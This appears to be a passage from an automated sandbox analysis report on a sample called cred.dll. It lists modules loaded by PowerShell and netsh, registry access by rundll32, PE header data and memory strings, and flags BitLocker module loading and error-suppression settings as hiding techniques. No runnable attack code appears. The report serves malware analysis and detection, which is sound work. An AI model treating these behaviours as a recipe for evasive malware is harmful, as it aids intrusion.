    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: cred.dllStatic file information: File size 1087488 > 1048576
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: cred.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: cred.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\dll\mscorlib.pdbA8? source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1738172284.0000019048E1B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1605350402.00000182F79CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb2 source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt` source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3281DD402BA65B9201D60593E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F74750E5975C64E2189F source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmp
    Source: cred.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: cred.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: cred.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: cred.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: cred.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B05121D pushad ; ret 11_2_00007FFB4B051262
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B06791E push 0000006Eh; iretd 11_2_00007FFB4B067924
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B065DAE push ss; retf 11_2_00007FFB4B065DB2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B0665DE push cs; retf 11_2_00007FFB4B0665DF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B065E0C push ss; retf 11_2_00007FFB4B065E0D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B065632 push ds; retf 11_2_00007FFB4B065633
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B066639 push cs; retf 11_2_00007FFB4B06663A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFB4B065E64 push ss; retf 11_2_00007FFB4B065E68

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
